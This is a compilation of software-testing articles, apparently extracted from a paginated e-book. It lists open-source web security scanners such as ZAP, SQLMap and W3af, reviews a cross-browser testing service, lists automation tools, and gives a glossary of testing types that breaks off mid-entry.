• 13. Ratproxy
Here are some of the Open Source Security Testing Tools which are
popular among Security Testers.
What is Security Testing?

data and maintains functionality as intended. Penetration testing or
pen testing is also a type of Security testing which is performed to
evaluate the security of the system (hardware, software, networks or
an information system environment).
We can do security testing using both manual and automated security

testing tools and techniques. Security testing reviews the existing
system to find vulnerabilities.
Most of the companies perform security testing on newly deployed or

developed software, hardware, and network or information system
100
environment. But it’s highly recommended by experts to make security

testing as a part of information system audit process of an existing
information system environment.
Must Read: Security Testing – Complete Guide

To find the flaws and vulnerabilities in a web application, there are
many free, paid, and open source security testing tools available in the
market. We know that the advantage of open source tools are we can
easily customize it to match our requirements. We are here to
showcase some of the top __ open source security testing tools.
We use security testing tools for checking how secure a website or

web application is.
Security tests include testing for vulnerabilities such as SQL Injection,
Cross-Site Scripting (XSS), Session Management, Broken
Authentication, Cross-Site Request Forgery (CSRF), Security
Misconfiguration, Failure to Restrict URL Access etc.,
Website hacking is quite common nowadays. Every now and then

there is some news regarding a website being hacked or data
breach. Infosec (information security) has come a long way and in the
same way, hacking too. To keep a website safe from hackers we need
to build secure websites to stay away from hackers. Web Security
Testing Tools acts proactively in detecting web application
vulnerabilities and safeguarding websites against attacks. There are
many paid and free web application testing tools available in the
market. Here, we discuss top 12 open source security testing tools for
web applications.
1. Zed Attack Proxy (ZAP)
Zed Attack Proxy popularly known as ZAP is an open source security
testing tool for a web application which was developed by OWASP
(Open Web Application Security Project). It runs on all operating
systems that support Java 8. It is one of the world’s most popular free
security tools and is actively maintained by volunteers. It is an easy to
use integrated penetration testing tool for finding a number of security
vulnerabilities in a web application while we are developing and testing
an application. It is also a great tool for experienced pentesters to use
for manual security testing. It is designed to be used by people with a
wide range of security experience and as such is ideal for developers
and functional testers who are new to penetration testing as well as
experienced security professionals. It comes with a friendly GUI which
helps newbies as well as experts. It gives command line access for
advanced users.
101
ZAP has a huge reputation amongst Security Testing Tools as being

easy to use, and powerful.
Highlights:
• Easy to use
• Easy to install
• Free, Open source
• Cross-platform
• Internationalized
Key features of ZAP are:
• Automatic scanning
• Rest-based API
• Intercepting proxy
• Authentication Support
• Ajax Spider
• Dynamic SSL Certificates
• SQL Injection
• XXS Injection
• Forced Browsing
• Fuzzing
• Web Socket Support
• Active and Passive scanners
• Cookie-based and HTTP authentication session management
• Anti CSRF token handling
Website Link: https://www.zaproxy.org/
2. Wfuzz
Wfuzz is a web application security fuzzer tool which is developed in
Python. It doesn’t come with GUI Interface, so security testers who
want to use this tool have to work on command line interface. This tool
is designed for bruteforcing web applications.
Key features of Wfuzz are:
• Multiple injection points with multiple dictionaries

• Post, headers and authentication data brute forcing
• Output to HTML
• Cookies fuzzing
• Multithreading
• Proxy Support
• SOCK Support
• Time delays between requests
• Authentication Support (NTLM, Basic)
• All parameters bruteforcing (POST and GET)
• Multiple encoders per payload
• Baseline request (to filter results against)
• Brute force HTTP methods
• Multiple proxy support (each request through a different proxy)
102
• HEAD scan (faster for resource discovery)

Website Link: http://www.edge-security.com/wfuzz.php
Source code Download Link: https://github.com/xmendez/wfuzz
3. Wapiti
Wapiti is a web application vulnerability scanner. It allows us to audit
the security of websites or web applications. It performs black box
scans of the web application by crawling the web pages of the
deployed webapp, looking for scripts and forms where it can inject
data. Once it gets the list of URLs, forms and their inputs, Wapiti acts
like fuzzer, injecting payloads to see if a script is vulnerable. This open
source security testing tool supports both GET and POST HTTP
attack methods. It is a command line application. It doesn’t come with
GUI. So it is important to have a knowledge of various commands of
Wapiti. There is detailed documentation on Wapiti official site.
It detects vulnerabilities like
• File disclosure
• Data injection
• XSS (Cross Site Scripting) injection
• XXE (XML External Entity) injection
• CRLF injection
• SSRF(Server Side Request Forgery)
• Bypass weak .htaccess configurations
• Shell shock (aka Bash Bug)
Key features of Wapiti web vulnerability scanner are:
• Supports both GET and POST HTTP methods for attacks
• Acts like a fuzzer
Website Link: http://wapiti.sourceforge.net/
Source Code Download Link: https://github.com/mbarbon/wapiti
4. W3af
W3af is a web application attack and audit framework that is
developed using python. It is one of the most popular web application
security testing frameworks in the market. It comes with both GUI and
console interface. It helps developers and penetration testers identify
and exploit vulnerabilities in web applications. It supports
authentication types such as HTTP basic authentication, NTLM
authentication, Form authentication, Cookie authentication. It is able to
identify more than 200 types of security issues in web applications,
including
• Cross-Site Scripting
• SQL Injection
• Guessable credentials
• Unhandled application errors
• PHP misconfigurations
103
• Blind SQL injections

• Buffer overflow vulnerability
• CORS (Cross-Origin Resource Sharing)
• CSRF (Cross Site Request Forgeries) vulnerabilities
• OS Commanding
• Authentication support
Website Link: http://w3af.org/
Source Code Download Link: https://github.com/andresriancho/w3af
5. Vega
Vega is a free and open source web security scanner and web
security testing platform to test the security of web applications. It is
written in Java and has a well designed graphical user interface (GUI)
runs on Linux, OS X, and Windows.
It exposes vulnerabilities including
• Find and validate SQL injection

• Cross-Site Scripting (XSS) injection
• Blind SQL injection
• Header injection
• Remote file include
• Shell injection
Website Link: https://subgraph.com/vega/
Source Code Download Link: https://github.com/subgraph/Vega
6. SQLMap
SQLMap is an open source penetration testing tool. It allows us to
automate the process of detecting and exploiting SQL injection
vulnerabilities in a website’s database. It comes with a powerful
detection engine and many features to detect vulnerabilities.
It supports 6 types of SQL Injection techniques:
• Boolean-based blind
• Time-based blind
• Error-based
• Union query-based
• Stacked queries
• Out-of-band
It supports a large number of database services such as
• MySQL
• Oracle
• PostgreSQL
• Microsoft SQL Server
• Microsoft Access
• IBM DB2
104
• SQLite
• Firebird
• Sybase
• SAP
• MaxDB
• Informix
• HSQLDB
• H2
Website Link: http://sqlmap.org/
Source Code Download
Link: https://github.com/sqlmapproject/sqlmap
7. SonarQube
SonarQube is an open source security testing tool developed by
SonarSource. It is an automatic code review tool to detect bugs,
vulnerabilities and code smells in your code.
Key features of SonarQube are

• Continuous inspection
• Detect Tricky issues
• Multi-Language support
• DevOps Integration
• Centralize Quality
Website Link: https://www.sonarqube.org/
Source Code Download
Link: https://github.com/SonarSource/sonarqube
8. Nogotofail
Nogotofail is a network security testing tool (network vulnerability
scanner tool) designed to help developers and penetration testers. As
a network security scanner, it includes testing for common SSL
certificate verification issues, HTTPS and TLS/SSL library bugs, SSL
and STARTTLS stripping issues, cleartext issues, and more.
Vulnerabilities exposed by Nogotofail network testing tool are
• SSL Injection
• TLS Injection
• SSL Certificate verification issues
• SSL and STARTTLS stripping issues
• Cleartext issues
Website Link: https://security.googleblog.com/2014/11/introducing-
nogotofaila-network-traffic.html
Source Code Download Link: https://github.com/google/nogotofail
9. Grabber
Grabber is an open source web application scanner that detects some
kind of vulnerabilities in a website or web applications. It is designed to
105
scan small websites such as forums and personal websites. It is

absolutely not for big application. It will take a too long time and flood
your network when you use it for a big application. It doesn’t come
with GUI interface. It was developed in Python.
Grabber can identify the following issues:
• Cross-site scripting
• SQL injection
• File inclusion
• Backup files check
• Simple AJAX check
• Hybrid analysis or Crystal ball testing for PHP application using
PHP-SAT
Website Link: https://tools.kali.org/web-applications/grabber
Source Code Download Link: https://github.com/amoldp/Grabber-
Security-and-Vulnerability-Analysis-
10. Arachni
Arachni is an open source security testing tool aimed towards helping
penetration testers and administrators evaluate the security of web
applications. It is a feature-full, modular, high-performance Ruby
framework. It supports all major operating systems such as MS
Windows, Mac OS X, and Linux. It is designed to identify security
issues within a web application and make it hacker proof.
Arachni can identify the following issues:
• Local file inclusion

• Remote file inclusion
• Invalidated redirects
• Invalidated DOM redirects
• XPath injection
• SQL injection
• XSS injection
Website Link: http://www.arachni-scanner.com/
Source Code Download Link: https://github.com/Arachni/arachni
11. Skipfish
Skipfish is an active web application security testing tool. It prepares
an interactive sitemap for the targeted site by carrying out a recursive
crawl and dictionary-based probes. It is available for Linux, Mac OS X,
and Windows.
Some of the security checks offered by Skipfish are:
• Server-side query injection

106
• Explicit SQL-like syntax in GET or POST parameters

• Server-side shell command injection
• Server-side XML/XPath injection
• Password forms submitting from or to non-SSL pages
• Incorrect or missing MIME types on renderable
Website Link: https://tools.kali.org/web-applications/skipfish
Source Code Download Link: https://github.com/spinkham/skipfish
12. Ratproxy
Ratproxy is an open source security testing tool. It is a semi-
automated, largely passive web application security audit tool.
Ratproxy assessments take little bandwidth or time to run and proceed
in an intuitive, distraction-free manner. It affords a consistent and
predictable coverage of user-accessible features. It is supported by all
popular operating systems such as Mac OS X, Windows, and Linux.
Website Link: https://sectools.org/tool/ratproxy/
Source Code Download Link: https://github.com/wallin/ratproxy
Conclusion:
We tried our best to bring la ist of top 12 Open Source Security
Testing Tools for web application (vulnerability scanning
tools/vulnerability assessment tools) for Web applications. Which is
your favorite security testing tool? Tell us in the comments. If you feel I
forgot to mention any of your favorite tools, let us know in the
comments below. We will try to include it in our list and update this
post.
Related Posts:
• Website Penetration Testing Tools/Pentest Tools
• Security Testing – Detailed Guide
Cross-browser Testing using

CrossBrowserTesting Tool |
Review By STM
Review of CrossBrowserTesting Tool
by SoftwareTestingMaterial
Testing things across browsers is part of the job of Software Testing. As
testers, we do want to verify our applications on multiple browsers. Recently,
107
I had the requirement to test the behavior of a web application on different

browsers. We usually cannot have all the browsers on one machine. Each
browser is designed by a different vendor. So each browser has their own
features to showcase their unique presence. While testing a website, we
need to ensure that our website is appearing same across all the browsers.
To do this we need to have all the browsers. You need to install all the
browser by spending a lot of time, and money. Fortunately, there is a
solution to overcome this cumbersome installation process and wasting
money unwantedly. The solution is CrossBrowserTesting.com. While
searching online for Cross Browser Test tools, I came across
CrossBrowserTesting and tried their free trial. I found it very useful to run my
tests on different browsers both manual and automated way.
Introduction to CrossBrowserTesting Tool:
CrossBrowserTesting tool has a wide range of different browsers and

their versions. It is available for multiple OS. It supports over 1500+
real desktop and mobile browsers. CrossBrowserTesting is a perfect
tool to perform Cross Browser Testing. CrossBrowserTesting provides
the easiest way to get started. Use CrosssBrowserTesting to automate
your web testing on real mobile and desktop browsers. You will get an
access to the combination of Browser, OS, Resolution, and Devices
your customers are using. CrossBrowserTesting interface is simply
awesome. You don’t need to do much to setup browsers and
operating systems. Imagine you would like to test your website using
Internet Explorer 11 on a Windows 8.1 machine, CrossBrowserTesting
provides you to select your required browsers and Operating system
to do so. Assume there is a requirement where you need to switch
from Internet Explorer 11 to Google Chrome 61, you just need to
change a few settings to start testing on your required environment. It
is the most popular commercial cross-browser testing tools. No need
to worry about virtual machines. Once connected to
CrossBrowserTesting you are able to do testing on your site on the
environment you would like to do. It offers a cloud-based automated
and manual testing on real browsers. Other features it offers are
recording videos, capturing screenshots and integration with Slack,
Jira and HipChat.
Installation of CrossBrowserTesting Tool:
Step 1: Open this link.

Step 2: Click on ‘Start Testing Now 7 Day Free Trial‘ button
Step 3: Give valid email id and password and click on ‘Create Your
Free Account‘.
CrossBrowserTesting.com Tool Plans:

108
It offers multiple plans such as Live Testing, Automated Testing, and

Unlimited Testing. Choose a plan based on your requirement. Prior to
this, you could try their 7 days free trial.
Features of CrossBrowserTesting Tool:
Live Tests: Allows to test functionality and appearance of your site.

You could test a real browser via an interactive remote testing
session. Great for verifying functionality and appearance of a site.
Pass an URL, select required browsers and version either Desktop or
Mobile you want to start testing the functionality of your site.
Step 1: Click ‘Live Testing‘ from the left sidebar
Step 2: Enter Your URL ‘SoftwareTestingMaterial.com‘
Enter the URL of the page you’d like to test. If the page is behind a
firewall or on a local server, please make sure to Enable Local
Connection in the top right.
Step 3: Select Your ‘Operating System‘, ‘Browser‘, and

‘Responsive mode‘
Select from Windows, Mac, even Ubuntu. If you’d like to test a mobile
device, select from the list of real Android or iOS devices or one of
many mobile emulators. Choose the browser and resolution you’d like
to test in CrossBrowserTesting.
Step 4: Click ‘Run Test‘
The OS or mobile device requested will appear on the screen in a
matter of seconds and load your URL for viewing, navigating, and
debugging with developer tools.
Here I have chosen Windows 8.1 OS and Internet Explorer 11

browser.
In the above screenshot, you could see the website

‘softwaretestingmaterial.com’ opened in Internet Explorer 11 browser
on Windows 8.1 with Resolution 1280×960
We could also update the OS, Browser, and Resolution.
Here I am updating the browser from IE 11 to Google Chrome 61.

Screenshots: Allows to capture screenshots of a URL across multiple
browsers and OS. Pass an URL, select required browsers and version
either Desktop or Mobile you want. Screenshot of your URL will
appear in a few minutes.
Step 1: Click ‘Screenshots‘ from the left sidebar
Step 2: Enter Your URL ‘SoftwareTestingMaterial.com‘
109
Enter the URL of the page you’d like to test. If the page is behind a
firewall or on a local server, please make sure to Enable Local
Connection in the top right.
Step 3: Choose your browsers and options.

Step 4: Click ‘Run Test‘ and the screen will flip to the Results page
while processing and ultimately delivering the results on-screen.
In the above screenshot, you could see the following:
1. Details of the test result: 6 Successful out of 6 Screenshots

2. Features to see windowed size screenshots, full page
screenshots, chromeless screenshots and other settings
3. Options to share link, send email and share on Slack, Hipchat,
and Jira
Automated Tests: Allows to test your web pages by automating the
browser via Selenium. You could create a new Selenium test or use
your existing Selenium test scripts on real browsers and devices right
in the cloud. In the next post, we see how to run Selenium Scripts
using CrossBrowserTesting.
Integrations: Integrate apps into CrossBrowserTesting.com to
automatically trigger notifications and manually share test results. It
supports Slack, Jira, and HipChat. Over to you.
Give CrossBrowserTesting.com free trial a go and see if you like it. I
am sure, you will become a paid customer
of CrossBrowserTesting.com after you experienced it.
Best Automation Testing Tools in

2020 (Top 10+ reviews)
In this post, we will see the Best Automation Testing Tools for 2020.
Software development practices change over time, so do the tools and

technologies. Such changes aim to improve productivity, quality,
customer satisfaction, to tackle ever-shorter delivery time, and to
deliver successful products and services. Software testing obviously
plays an important role in achieving these objectives.
The recently released World Quality Report 2017–2018 by Capgemini,

Sogeti, and Marco Focus points out several interesting trends in
software quality and testing. Two of three key trends are increasing
test automation and widespread adoption of agile and DevOps
110
methodologies. As the report shows, organizations need intelligent

automation and smart analytics to speed up decision making and
validation and to better address the challenges of testing smarter
devices and products that are highly integrated and continuously
changing. The report also suggests the need for smart test platforms
that are self-aware and self-adaptive to support the complete
application lifecycle.
In the test automation landscape, automation tools certainly take a
center stage. This post summarizes the top test automation tools and
frameworks that have the potential to help organizations to best
position themselves to keep pace with the trends in software testing.
The list includes both open-source and commercial test automation
solutions.
List of Popular Automation Testing
Tools:
Here I am going to list the tools used for automation testing contains
both free and commercial ones.
1. Kobiton
2. Selenium
3. Subject7
4. Ranorex
5. LambdaTest
6. Katalon Studio
7. UFT
8. Watir
9. IBM Rational Functional Tester
10. TestComplete
11. EggPlant
12. Tricentis Tosca
13. Robot Framework
Now that you know of a list, let us take a look at each of them in detail.
Best Automation Testing Tools
1. Kobiton:
Kobiton’s mobile device testing platform accelerates the testing and

delivery of mobile applications by offering live device testing in the
111
cloud. Through their Intelligent Test Automation, a scriptless

automation solution, Kobiton enables companies to conduct the
extensive, automated real-device testing necessary to create flawless
experiences for all users on all devices.
Features:
• Scriptless appium automation
• Automated crash detection
• Visual validation for a pixel-perfect app on all devices
• Recommendation Engine powered by AI to help the tester
Website: Kobiton
To learn Kobiton, read our detailed Kobiton Tutorial.
2. Selenium:
Selenium is possibly the most popular open-source test automation

framework for Web applications. Being originated in the 2000s and
evolved over a decade, Selenium has been an automation framework
of choice for Web automation testers, especially for those who
possess advanced programming and scripting skills. Selenium has
become a core framework for other open-source test automation tools
such as Katalon Studio, Watir, Protractor, and Robot Framework.
Selenium supports multiple system environments (Windows, Mac,

Linux) and browsers (Chrome, Firefox, IE, and Headless browsers). Its
scripts can be written in various programming languages such as
Java, Groovy, Python, C#, PHP, Ruby, and Perl.
While testers have flexibility with Selenium and they can write complex
and advanced test scripts to meet various levels of complexity, it
requires advanced programming skills and effort to build automation
frameworks and libraries for specific testing needs.
Website: Selenium
License: Open-source
To learn Selenium, read our detailed Selenium Tutorial.
3. Subject7
112
Subject7 is a State-of-the-art cloud-based platform for end-to-end test

automation which covers web, native mobile, desktop, database, web
services (REST and SOAP), load testing, security testing,
508/accessibility testing, manual testing, and much more. The
Subject7 Platform provides end-to-end test automation capabilities
through a series of commands. These commands are available via an
easy-to-use web interface, hiding the complexities of industry-standard
packages such as Selenium, Appium, SikuliX, JMeter, ZAP, and
others.
Subject7 Player, which executes these automation commands, is
available on users’ machines (for authoring and debugging), in the
cloud for parallel execution, as a load-generating engine, and for
active or passive security checks, all using the same commands
making automation uniform across-the-board.
Extensive APIs allow for integration into JIRA, Jenkins, GitHub, or any
DevOps platform for test automation in real time. It is further available
on public, protected, or private clouds (i.e. on-premise).
Website: Subject7
Pricing: Commercial SaaS
4. Ranorex
Ranorex Studio is an all-in-one test automation tool for desktop,

mobile, and web trusted by over 4,000 companies worldwide. The
application offers codeless test automation, enabling beginners to test
straight away, as well as a complete IDE to give experts the power
they need.
Features:
• Reliable object identification, even for web elements with
dynamic IDs.
• Shareable object repository.
• Reduce test maintenance with reusable code modules.
• Cross-platform and cross-browser testing.
• Test in parallel or distribute on a Selenium Grid with built-in
Selenium WebDriver.
• Customizable, easy-to-read test reports.
• Enable video reporting to see what caused a test to fail without
re-running the test.
113
• Integrates with a complete testing toolchain: Azure DevOps,

Jira, Jenkins, TestRail, Git, and more.
Official Link: Ranorex
5. LambdaTest:
LambdaTest is a Cross Browser Testing Cloud, allows developers and

testers to perform Cross Browser Testing on 2000+ Real Browsers
and Operating System Online in varying screen resolutions.
LambdaTest allows us to test on latest mobile and desktop browsers
on the cloud. We can ensure our website is compatible across all
browsers and devices by performing Real-time cross Browser
Compatibility testing with LambdaTest. We can choose from a wide
range of updated Android and iOS mobile devices from latest to oldest
versions of Chrome, Firefox, Safari, Edge, Internet Explorer, Opera,
and Yandex. It also allows us to test for responsiveness and take full
paged automated screenshots. Supported devices are Windows,
Android, iPhone/iPad, Mac, and Web-based.
Features:
• Online Browser Compatibility Testing.
• 2000+ Real Browsers and Operating System Online in varying
screen resolutions.
• Faster Automated Screenshots / Screenshot testing.
• Check Responsiveness on All Screen Sizes.
• Seamless Collaboration and Testing.
• Testing Locally Hosted Pages.
• Smart Visual Regression Testing.
• Resolution Display Testing. Screen resolutions ranging from
800×600 to 2560×1440 are available.
• LambdaTest Inbuilt Issue Tracker.
Free Trial: Lifetime free (1 concurrent session – 5 users)
Pricing: $15/mo for an annual plan and $19/mo for a monthly plan
Official Link: LambdaTest
Check out our review on LambdaTest Cross Browser Testing Tool
6. Katalon Studio
114
Katalon Studio is a powerful test automation solution for a web

application, mobile, and web services. Being built on top of the
Selenium and Appium frameworks, Katalon Studio takes advantage of
these solutions for integrated software automation.
The tool supports different levels of testing skill set. Non-programmers
can find it easy to start an automation testing project (like using Object
Spy to record test scripts) while programmers and advanced
automation testers can save time from building new libraries and
maintaining their scripts.
Katalon Studio can be integrated into CI/CD processes and works well
with popular tools in the QA process including qTest, JIRA, Jenkins,
and Git. It offers a nice feature called Katalon Analytics which provides
users comprehensive views of test execution reports via dashboard
including metrics, charts, and graphs.
License: Free
To learn Katalon, read our Katalon Studio Tutorial
7. UFT
Unified Functional Testing (UFT) is a well-known commercial testing
tool for functional testing. It provides a comprehensive feature set for
API, web services, and GUI testing of desktop, web, and mobile
applications across platforms. The tool has advanced image-based
object recognition feature, reusable test components, and automated
documentation.
UFT uses Visual Basic Scripting Edition to register testing processes
and object control. UFT is integrated with Mercury Business Process
Testing and Mercury Quality Center. The tool supports CI via
integration with CI tools such as Jenkins.
Website: UFT
License: Commercial
8. Watir
Watir is an open-source testing tool for web automation testing based
on Ruby libraries. Watir supports cross-browser testing including
Firefox, Opera, headless browser, and IE. It also supports data-driven
testing and integrates with BBD tools like RSpec, Cucumber, and
Test/Unit.
Website: Watir
9. IBM Rational Functional Tester
115
IBM RFT is a data-driven testing platform for functional and regression

testing. It supports a wide range of application such as .Net, Java,
SAP, Flex, and Ajax. RFT uses Visual Basic .Net and Java as
scripting languages. RFT has a unique feature called Storyboard
testing in which users’ actions on AUT are recorded and visualized in
a storyboard format through application screenshots.
Another interesting feature of RFT is its integration with IBM Jazz
application lifecycle management systems such as IBM Rational Team
Concert and Rational Quality Manager.
Website: IBM RFT
License: Commercial
10. TestComplete
TestComplete by SmartBear is a powerful commercial testing tool for
web, mobile, and desktop testing. TestComplete supports various
scripting languages such as JavaScript, VBScript, Python, and
C++Script. Like Katalon Studio, testers can perform keyword-driven
and data-driven testing with TestComplete. The tool also offers an
easy-to-use record and playback feature.
Like UTF, TestComplete’s GUI object recognition capability can
automatically detect and update UI objects which helps reduce the
effort to maintain test scripts when the AUT is changed. It also
integrates with Jenkins in a CI process.
Website: TestComplete
License: Commercial
11. EggPlant (TestPlant)
An image-based automated functional testing tool that enables testers
to interact with AUT the same way end users do. TestPlant eggPlant is
completely different from traditional testing tools in its approach:
modeling user’s point of view rather instead of the test scripts view
often seen by testers. This allows testers with less programming skills
to learn and apply test automation intuitively. The tool supports various
platforms like Web, mobile, and POS systems. It offers lab
management and CI integration as well.
Website: EggPlant
License: Commercial
12. Tricentis Tosca
Tricentis Tosca is a model-based test automation tool that provides
quite a broad feature set for continuous testing including dashboards,
analytics, and integrations to support agile and DevOps
methodologies.
Tricentis Tosca helps users to optimize the reusability of test assets.
Like many other test automation tools, it supports a wide range of
technologies and applications such as web, mobile, and API. Tricentis
Tosca also has features for integration management, risk analysis,
and distributed execution.
116
Website: Tricentis Tosca

License: Commercial
13. Robot framework
Robot Framework is an open-source automation framework that
implements the keyword-driven approach for acceptance testing and
acceptance test-driven development (ATDD). Robot Framework
provides frameworks for different test automation needs. But its test
capability can be further extended by implementing additional test
libraries using Python and Java. Selenium WebDriver is a popular
external library used in Robot Framework.
Test engineers can leverage Robot Framework as an automation
framework for not only web testing but also for Android and iOS test
automation. Robot Framework can be easy to learn from testers who
are familiar with keyword-driven testing.
Website: Robot Framework
As we can see, each of these automation tools has unique features to
offer in addressing the growing challenges of software automation in
the years ahead. Most provide capabilities for continuous testing and
integration, test management, and reporting. They all support
increasing automation needs for Web and Mobile testing. However,
intelligent testing and smart analytics for adaptive and heterogeneous
environments are still something to be desired for automation tools.
Here I have hand-picked a few posts which will help you to learn more
about Software Testing.
• Best Bug Tracking Tools
• Best API Testing Tools
• Popular Test Management Tools
• Test Strategy Document – A Complete Guide
• How To Prepare A Test Plan
• Test Case Template with Detailed Explanation
• Explain Test Automation Framework
• Manual Testing Tutorial
• Selenium Tutorial
If you have any more questions, feel free to ask via comments. If you
find this post useful, do share it with your friends on Social
Networking.
Disclaimer: The order of tools doesn’t suggest any recommendations.

You may choose any tool as per your requirements.
About The Author:
Katalon Studio is a simple and powerful automation solution built by
KMS Technology for testers everywhere. The tool provides
comparable features to popular commercial solutions whilst
117
eliminating the effort to build an automation framework from open

sources. Best of all, we’re committed to keeping Katalon Studio free.
Update: Above post is recently modified by STM admin
100+ Types of Software Testing –

The Ultimate List |
The Ultimate List of 100+ Types of
Software Testing
In this post ‘Types of Software Testing’, I would like to mention almost all
the software testingtypes at one place. One challenge to learning about
software testing is that there are many terms in the industry, and these
terms often used inconsistently. While there is no universally-accepted
definitions for all the testing terms, I think a good source is to refer ISTQB
Certified Tester Foundation Level Syllabus.
I would like to start with Software Testing before going to the actual
post 100+ Software Test Types.
Software Testing: It is a process, to evaluate the functionality of a

software application with an intent to find whether the developed
software met the specified requirements or not and to identify the
defects to ensure that the product is defect free in order to produce the
quality product. Read more on Software Testing Definitions &
Approaches.
The Ultimate list of Types of Testing:
Let’s see different Types of Software Testing one by one.
1. Functional testing: In simple words, what the system actually does

is functional testing. To verify that each function of the software
application behaves as specified in the requirement document. Testing
all the functionalities by providing appropriate input to verify whether
the actual output is matching the expected output or not. It falls within
the scope of black box testing and the testers need not concern about
the source code of the application.
2. Non-functional testing: In simple words, how well the system
performs is non-functionality testing. Non-functional testing refers to
various aspects of the software such as performance, load, stress,
scalability, security, compatibility etc., Main focus is to improve the
user experience on how fast the system responds to a request.
118
3. Manual testing: Manual testing is the process of testing the

software manually to find the defects. A tester should have the
perspective of an end user and to ensure all the features are working
as mentioned in the requirement document. In this process, testers
execute the test cases and generate the reports manually without
using any automation tools.
4. Automated testing: Automation testing is the process of testing the
software using an automation tool to find the defects. In this process,
executing the test scripts and generating the results are performed
automatically by automation tools. Some most popular tools to do
automation testing are HP QTP/UFT, Selenium WebDriver, etc.,
Learn the Difference between Manual & Automated Testing here…
5. Black box testing: Black Box Testing is a software testing method
in which testers evaluate the functionality of the software under test
without looking at the internal code structure. This can be applied to
every level of software testing such as Unit, Integration, System and
Acceptance Testing.
Read more on black box testing here…
6. Glass box testing – Refer white box testing
7. White box testing: White Box Testing is also called as Glass Box,
Clear Box, and Structural Testing. It is based on applications internal
code structure. In white-box testing, an internal perspective of the
system, as well as programming skills, are used to design test cases.
This testing usually was done at the unit level.
Click here for more details.
8. Specification-based testing: Refer black-box testing.
9. Structure-based testing: Refer white-box testing.
10. Gray box testing: Grey box is the combination of both White Box
and Black Box Testing. The tester who works on this type of testing
needs to have access to design documents. This helps to create
better test cases in this process.
11. Unit testing: Unit Testing is also called Module Testing or
Component Testing. It is done to check whether the individual unit or
module of the source code is working properly. It is done by the
developers in the developer’s environment.
12. Component testing: Refer Unit Testing
13. Module testing: Refer Unit Testing
14. Integration testing: Integration Testing is the process of testing
the interface between the two software units. Integration testing is
done by multiple approaches such Big Bang Approach, Top-Down
Approach, Bottom-Up Approach, and Hybrid Integration approach.
Integration Testing Complete Guide
15. System testing: Testing the fully integrated application to
evaluate the system’s compliance with its specified requirements is
called System Testing AKA End to End testing. Verifying the
119
completed system to ensure that the application works as intended or

not.
16. Acceptance testing: It is also known as pre-production
testing. This is done by the end users along with the testers to
validate the functionality of the application. After successful
acceptance testing. Formal testing conducted to determine whether an
application is developed as per the requirement. It allows the customer
to accept or reject the application. Types of acceptance testing are
Alpha, Beta & Gamma.
17. Big bang Integration Testing: Combining all the modules once
and verifying the functionality after completion of individual module
testing.
Top down and bottom up are carried out by using dummy modules
known as Stubs and Drivers. These Stubs and Drivers are used to
stand-in for missing components to simulate data communication
between modules.
18. Top-down Integration Testing: Testing takes place from top to

bottom. High-level modules are tested first and then low-level modules
and finally integrating the low-level modules to a high level to ensure
the system is working as intended. Stubs are used as a temporary
module if a module is not ready for integration testing.
19. Bottom-up Integration Testing: It is a reciprocate of the Top-
Down Approach. Testing takes place from bottom to up. Lowest level
modules are tested first and then high-level modules and finally
integrating the high-level modules to a low level to ensure the system
is working as intended. Drivers are used as a temporary module for
integration testing.
20. Hybrid Integration Testing: Hybrid integration testing is the
combination of both Top-down and bottom-up integration testing.
21. Alpha testing: Alpha testing is done by the in-house developers
(who developed the software) and testers. Sometimes alpha testing is
done by the client or outsourcing team with the presence of
developers or testers.
22. Beta testing: Beta testing is done by a limited number of end
users before delivery. Usually, it is done in the client place.
23. Gamma Testing: Gamma testing is done when the software is
ready for release with specified requirements. It is done at the client
place. It is done directly by skipping all the in-house testing activities.
24. Equivalence partitioning testing: Equivalence Partitioning is also
known as Equivalence Class Partitioning. In equivalence partitioning,
inputs to the software or system are divided into groups that are
expected to exhibit similar behavior, so they are likely to be proposed
in the same way. Hence selecting one input from each group to design
the test cases.
Read more on Equivalence Partitioning Testing Technique…
120
25. Boundary value analysis testing: Boundary value analysis

(BVA) is based on testing the boundary values of valid and invalid
partitions. The Behavior at the edge of each equivalence partition is
more likely to be incorrect than the behavior within the partition, so
boundaries are an area where testing is likely to yield defects. Every
partition has its maximum and minimum values and these maximum
and minimum values are the boundary values of a partition. A
boundary value for a valid partition is a valid boundary value. Similarly,
a boundary value for an invalid partition is an invalid boundary value.
Read more on Boundary Value Analysis Testing Technique…
26. Decision tables testing: Decision Table is aka Cause-Effect
Table. This test technique is appropriate for functionalities which has
logical relationships between inputs (if-else logic). In Decision table
technique, we deal with combinations of inputs. To identify the test
cases with decision table, we consider conditions and actions. We
take conditions as inputs and actions as outputs.
Read more on Decision Table Testing Technique…
27. Cause-effect graph testing– Refer Decision Table Testing
28. State transition testing: Using state transition testing, we pick
test cases from an application where we need to test different system
transitions. We can apply this when an application gives a different
output for the same input, depending on what has happened in the
earlier state.
Read more on State Transition Test Design Technique…
29. Exhaustive Testing: Testing all the functionalities using all valid
and invalid inputs and preconditions is known as Exhaustive testing.
30. Early Testing: Defects detected in early phases of SDLC are less
expensive to fix. So conducting early testing reduces the cost of fixing
defects.
31. Use case testing: Use case testing is carried out with the help of
use case document. It is done to identify test scenarios to test end to
end testing
32. Scenario testing: Scenario testing is a software testing technique
which is based on a scenario. It involves in converting business
requirements to test scenarios for better understanding and achieve
end to end testing. A well designed scenario should be motivating,
credible, complex and the outcome of which is easy to evaluate.
33. Documentation testing: Documentation testing is done to
